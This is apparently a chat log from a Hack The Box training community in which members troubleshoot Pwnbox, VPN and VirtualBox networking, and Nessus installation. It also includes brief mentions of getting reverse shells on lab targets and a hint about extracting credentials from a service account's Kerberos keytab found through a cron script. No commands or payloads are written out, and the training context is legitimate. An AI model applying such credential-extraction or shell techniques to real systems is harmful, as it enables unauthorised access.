like not displaying properly, not doing what you think it should...

Just re install the VM. If that doesn't work, choose a different hyperviser like qemu and try again.

vmware pro is now free.

I found that qemu works better on Linux hosts

y'all i am literally giving up

but you gotta give your info to broadcom, so L

vmware pretty much industry standard

anyway

everyone else trying to play catchup

I was able to launch pwnbox on my system with no issues

this is happening on linux and windows

looks like issues with your graphics card

i cba to make a screen recording

both graphics cards?

this is on two different machines

Nah

I've never used pwnbox so idk lol

what browser are you using

ff, i see. that's what i use

yo this is the third time i'm saying now that i'm giving up for the night

Ok

TBH it looks like it's trying to resize as if you're trying to open academy within the pwnbox

thank you all for the help

Like we're forcing you to do shit lmao

im going to try again tomorrow

yeah, you're having pwnbox inception there

oh yeah that would do it

it's probably trying to open pwnbox in pwnbox

you are logging into the pwnbox and then logging into htb and viewing the pwonbox again

^

and whenever the pwnbox view screen is pulled it resizes the screen

there's no reason to do that and it's probably causing issues

and does so recursively as it's refreshing constantly

i can't figure out how to connect to remote host then because the one on academy on my host machine isn't working

you can just browse academy on your host; then interact via pwnbox

when using the pwnbox, you don't need to connect to the remote host with your computer. the pwnbox is already connected to htb's internal network and can reach the victim box you spawn.

you don't/shouldn't be opening academy within pwnbox

well it automatically connects to your selected vpn region* but same point really

you don't connect to the vpn when using pwnbox, it's already connected as i mentioned

no like i can't figure out how to connect to the IP that academy gives me

it doesn't work

you connect to the box you spawn through the pwnbox

not your host

make sure you don't have any vpn processes open on your host

if you're using the pwnbox, don't run the VPN, and vice versa

so i spawn a box through the pwnbox and then i connect to it right?

no

you spawn it through the academy page

as if you were just using your own vm

yeah that's the fucking thing i just said i was having a problem with

just don't open academy with the pwnbox

it
doesn't
work

it will not connect

then you're doing something wrong

you spawn the target box. then you spawn the pwnbox and use it in another tab or something. just use the pwnbox directly, it can already connect to the victim box you spawn

what do you mean "It will not connect"

the pwnbox is already connected, you do not need to connect it to anything

holy shit dude it won't connect to the webpage

you don't conect to the vpn with the pwnbox, it's already connected to the internal network.

"It doesn't work" and "It will not connect" aren't really proper errors for us to help you

the webpage won't load

Wym?

you literally showed us a video of you looking at the pwnbox

ok so you mean the base webpage of the target won't load?

yes thank you

this is what i mean when i say i have nothing but unfixable technical difficulties

they're fixable

you just need to have a better mental about it

tell that to the 20 ways i tried to fix my reverse shell issue

they are fixable, but you're probably searching for the wrong thing

they seem unfixable to you because you're not really explaining the issue well enough

you cannot articulate your problem correctly, so you probably can't search for the correct solution

this could just be that your VM is fucked

Lol

since it worked in host, and metasploit wasn't working

you have to be willing to accept "Maybe I just need to reinstall" as a fix option

Let's take it at step 0; is your host connected to the VPN, if so -- kill the VPN process

okay ignore that it was an example

i'm going to try reinstalling tomorrow i was just giving an example

good luck

Thats probably gonna fix everything trust

reinstall isn't going to fix the network manager's configuration

look

we're suspecting other issues since the fact that Metasploit wasn't even working

https

the pwnbox should work easily as long as you spawn the pwnbox and target ip, then just use the pwnbox in another tab or something. if you want your vm to work you'd need to configure the network manager correctly.

already tried

that's the problem

you need to use http

tried that too

the site isn't using https

never mind

metasploit is a piece of trash sometimes and does require a reinstall sometimes.

i tried http, didn't work, tried https, didn't work, tried http, worked

it began freezing up my whole vm and i had to reinstall

you likely typoed for http the first time

it happens

don't you need the port too? each spawn uses a different port

no

no

depends on the box

this one doesn't have a port

not for targets that are using the 10.129.0.0/16 subnet

ah. noted. i haven't gotten that far yet 😅

only for ones that are using a public_ip:port

if you're doing the CBBH path, you're likely not gonna run into many examples

as most of the web modules use docker containers with a public_ip:port

and it stopped working again

https://tenor.com/view/stop-it-get-some-help-michael-jordan-gif-10891312

i see. yeah, i just started CBBH. breezing through the first few modules at the moment. i only started HTB this week.

I think you should just do what you said; and take a break

we don't know what "it" is, nevertheless you sound frustrated and should probably take the night off as you said

come back tomorrow with a rested mind

when you're repeatedly getting frustrated is a good sign you need a break

pwnbox

very underrated advice. taking a break does wonders. seriously

And a positive mindset....

I can provide help if you want, but you said you were done for the night

fun fact, when working on a difficult problem -- researchers found that when participants were able to take breaks/weren't given a time pressure they were able to solve it faster

I suggest making sure you understand the content; breezing through doesn't necessarily mean you understand what you did

taking notes to help make sure you understand what you're doing is helpful

oh yes, i do understand it. 🙂 i'm not new to this. but never had any formal education (my technical background is something else). so i'm breezing through the parts that i'm already very familiar with

ok yeah the webpages on pwnbox literally just keep timing out and coming back tomorrow with a rested mind isn't going to fix that

Lmao

never mind my vm was eating my bandwidth for breakfast

I can't

okay i got a reverse shell on pwnbox which means there's something horribly wrong with my vm and on that note i am off for the night and i am going to come back tomorrow with a Positive Mindset now that i know where to start troubleshooting

thank you all for the help sorry for being an asshole

That's literally what we've been telling you for the past hour

yeah i know i just wanted to see if i could get a reverse shell on pwnbox before i got off for the night

it's your network setup like i said

once the network manager is configured correctly i'm sure it'll work fine

the vbox network manager right

i'm not familiar with virtualbox, but i can't imagine it doesn't have some kind of network manager

i use vmware pro

it does indeed have a network manager

think about it this way: connectivity issue. it can only be a few things. 1) connectivity from your vm. 2) connectivity from your vm to your hypervisor. 3) hypervisor connection to your host. 4) your host's connection to the internet.

so if you have connectivity issues, it's one of those things. sounds like you have tried disabling firewall etc on your vm, so if you're confident it's not the vm, the next step to investigate is the hypervisor's setup.

that's where the network manager comes into play

https://www.virtualbox.org/manual/ch06.html

get some rest, if all else fails the pwnbox should work

i switched to bridged. and it worked. i got a reverse shell. all i had to do was switch to bridged. i could have sworn i already did that. but it worked.

Congrats 🎉 but i still recommend re installing your VM bc it seem to have issues

Can’t download Nessus on Linux arm64
😒

what Process did you use to download?

The Nessus website.
They don’t have the binaries for arm64.

The do

I only saw amd64

https://www.tenable.com/downloads/nessus?loginAttempted=true

Drop down has arm64

I got ips of 2 hackers who compromised all my passwords on my google account

can someone help me

Could you screenshot it?
I only see amd64

Not sure what to do.
You’d probably have to contact google.

contact google, change all your passwords

is there a way to do it all together not 1 by 1

this isn't a hacker for hire server read #rules

no

not hiring anyone

lol…

that's the rough part of having your account compromised

i just need help on what to do

change all your passwords

make sure that no other devices are still logged on

how can I check that

Nvm I thought I saw it lol. AARCH64 might work

iirc if you change your google account password there's an option to "log out of all devices"

Google it

Doesn’t work.

this isn't a support server

Did you try installing?

Yes

it seems the ubuntu AARCH64 is what people have used in the past

Yeah

Any errors?

tbqh you don't need to install Nessus for the Vulnerability Scan module

the host they have for the practical portion has nessus installed, and pre-run scans

I’m having a hard time getting through the Vulnerability Assessment module because I can’t download Nessus on my vm and it doesn’t seem to be installed on the pwnbox like they said.

lol yes.

it won't be on the pwnbox

it's on the target box at https://ip:nessusport

Hmm I’ll try that…

with the login info provided

Should work with openvpn?

yes

we can't help with a question you don't ask

Lol

https://dontasktoask.com

Someone actually hosting a website to explain all that wow

check the other links on that site

actually useful

Ok I'm in carlos crontab, I spot the sh script who use kinit to svc_workstations user, the script then execute smbclient to connect. the question says I need to auth via SSH, Im lost to obtain credentials of that svc_workstations.kt

It’s not loading. Idk.

are you connected to the vpn?

there's a way to extract keytab info

read the section carefully

Yes ma’am… see my tun0 ip up there in the corner?

do you have the pwnbox running as well?

yes I used that tool in another question, but the file was .keytab, this is .kt is the same way?

what do you think .kt is short for? 😉

I can ssh into that ip, but this Nessus stuff ain’t workin.